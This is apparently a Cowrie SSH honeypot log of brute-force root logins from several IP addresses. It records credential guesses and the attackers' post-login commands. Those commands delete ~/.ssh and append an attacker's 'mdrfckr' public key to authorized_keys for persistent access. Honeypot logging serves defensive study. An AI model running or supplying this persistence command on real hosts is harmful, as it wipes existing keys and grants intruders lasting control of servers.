{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T13:19:38.965893Z","src_ip":"45.88.8.186","session":"28686e8ae080"}
{"eventid":"cowrie.login.success","username":"root","password":"QWE123qwe","message":"login attempt [root/QWE123qwe] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:19:42.244219Z","src_ip":"45.88.8.186","session":"28686e8ae080"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:19:43.219779Z","src_ip":"45.88.8.186","session":"28686e8ae080"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:19:50.719767Z","src_ip":"212.227.235.229","session":"b69c445410c4"}
{"eventid":"cowrie.session.closed","duration":180.2929503917694,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:19:50.725324Z","src_ip":"212.227.235.229","session":"b69c445410c4"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":35332,"dst_ip":"1.2.3.4","dst_port":22,"session":"24a4371c153f","protocol":"ssh","message":"New connection: 167.99.49.89:35332 (1.2.3.4:22) [session: 24a4371c153f]","sensor":"my-vps","timestamp":"2025-08-26T13:19:50.798157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:19:50.799692Z","src_ip":"167.99.49.89","session":"24a4371c153f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:19:50.894954Z","src_ip":"167.99.49.89","session":"24a4371c153f"}
{"eventid":"cowrie.login.success","username":"root","password":"Huawei12#$%","message":"login attempt [root/Huawei12#$%] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:19:51.300569Z","src_ip":"167.99.49.89","session":"24a4371c153f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:19:51.502002Z","src_ip":"167.99.49.89","session":"24a4371c153f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:19:51.502973Z","src_ip":"167.99.49.89","session":"24a4371c153f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:19:51.505947Z","src_ip":"167.99.49.89","session":"24a4371c153f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:19:51.603285Z","src_ip":"167.99.49.89","session":"24a4371c153f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:19:51.909691Z","src_ip":"167.99.49.89","session":"24a4371c153f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:19:51.910587Z","src_ip":"167.99.49.89","session":"24a4371c153f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:19:52.005266Z","src_ip":"167.99.49.89","session":"24a4371c153f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:19:52.006140Z","src_ip":"167.99.49.89","session":"24a4371c153f"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":35340,"dst_ip":"1.2.3.4","dst_port":22,"session":"443503e89ff3","protocol":"ssh","message":"New connection: 167.99.49.89:35340 (1.2.3.4:22) [session: 443503e89ff3]","sensor":"my-vps","timestamp":"2025-08-26T13:19:52.094020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:19:52.095406Z","src_ip":"167.99.49.89","session":"443503e89ff3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:19:52.185950Z","src_ip":"167.99.49.89","session":"443503e89ff3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:19:52.584889Z","src_ip":"167.99.49.89","session":"443503e89ff3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:19:53.680109Z","src_ip":"167.99.49.89","session":"443503e89ff3"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":45458,"dst_ip":"1.2.3.4","dst_port":22,"session":"01ab9072c604","protocol":"ssh","message":"New connection: 167.99.49.89:45458 (1.2.3.4:22) [session: 01ab9072c604]","sensor":"my-vps","timestamp":"2025-08-26T13:19:53.771825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:19:53.772657Z","src_ip":"167.99.49.89","session":"01ab9072c604"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:19:53.864149Z","src_ip":"167.99.49.89","session":"01ab9072c604"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:19:54.272872Z","src_ip":"167.99.49.89","session":"01ab9072c604"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:19:54.367566Z","src_ip":"167.99.49.89","session":"24a4371c153f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:19:54.368832Z","src_ip":"167.99.49.89","session":"01ab9072c604"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42965,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce7174dcae24","protocol":"ssh","message":"New connection: 212.227.235.229:42965 (1.2.3.4:22) [session: ce7174dcae24]","sensor":"my-vps","timestamp":"2025-08-26T13:19:56.378706Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45808,"dst_ip":"1.2.3.4","dst_port":22,"session":"339dcb5b363d","protocol":"ssh","message":"New connection: 212.227.235.229:45808 (1.2.3.4:22) [session: 339dcb5b363d]","sensor":"my-vps","timestamp":"2025-08-26T13:20:17.350211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:20:17.351066Z","src_ip":"212.227.235.229","session":"339dcb5b363d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:20:24.152188Z","src_ip":"212.227.235.229","session":"339dcb5b363d"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:20:24.154563Z","src_ip":"212.227.235.229","session":"339dcb5b363d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39824,"dst_ip":"1.2.3.4","dst_port":22,"session":"00c7ede8d7ce","protocol":"ssh","message":"New connection: 212.227.235.229:39824 (1.2.3.4:22) [session: 00c7ede8d7ce]","sensor":"my-vps","timestamp":"2025-08-26T13:20:49.443880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:20:49.445026Z","src_ip":"212.227.235.229","session":"00c7ede8d7ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:20:49.689982Z","src_ip":"212.227.235.229","session":"00c7ede8d7ce"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567aA","message":"login attempt [root/1234567aA] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:20:50.709418Z","src_ip":"212.227.235.229","session":"00c7ede8d7ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:20:51.282071Z","src_ip":"212.227.235.229","session":"00c7ede8d7ce"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:20:51.282955Z","src_ip":"212.227.235.229","session":"00c7ede8d7ce"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:20:51.284119Z","src_ip":"212.227.235.229","session":"00c7ede8d7ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:20:51.530922Z","src_ip":"212.227.235.229","session":"00c7ede8d7ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:20:52.042987Z","src_ip":"212.227.235.229","session":"00c7ede8d7ce"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:20:52.043527Z","src_ip":"212.227.235.229","session":"00c7ede8d7ce"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:20:52.290233Z","src_ip":"212.227.235.229","session":"00c7ede8d7ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:20:52.291295Z","src_ip":"212.227.235.229","session":"00c7ede8d7ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42090,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3f1aece6259","protocol":"ssh","message":"New connection: 212.227.235.229:42090 (1.2.3.4:22) [session: a3f1aece6259]","sensor":"my-vps","timestamp":"2025-08-26T13:20:52.532873Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:20:52.533864Z","src_ip":"212.227.235.229","session":"a3f1aece6259"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:20:52.778136Z","src_ip":"212.227.235.229","session":"a3f1aece6259"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:20:53.796018Z","src_ip":"212.227.235.229","session":"a3f1aece6259"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:20:55.042543Z","src_ip":"212.227.235.229","session":"a3f1aece6259"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43984,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f5bab50a09c","protocol":"ssh","message":"New connection: 212.227.235.229:43984 (1.2.3.4:22) [session: 2f5bab50a09c]","sensor":"my-vps","timestamp":"2025-08-26T13:20:55.286835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:20:55.287602Z","src_ip":"212.227.235.229","session":"2f5bab50a09c"}
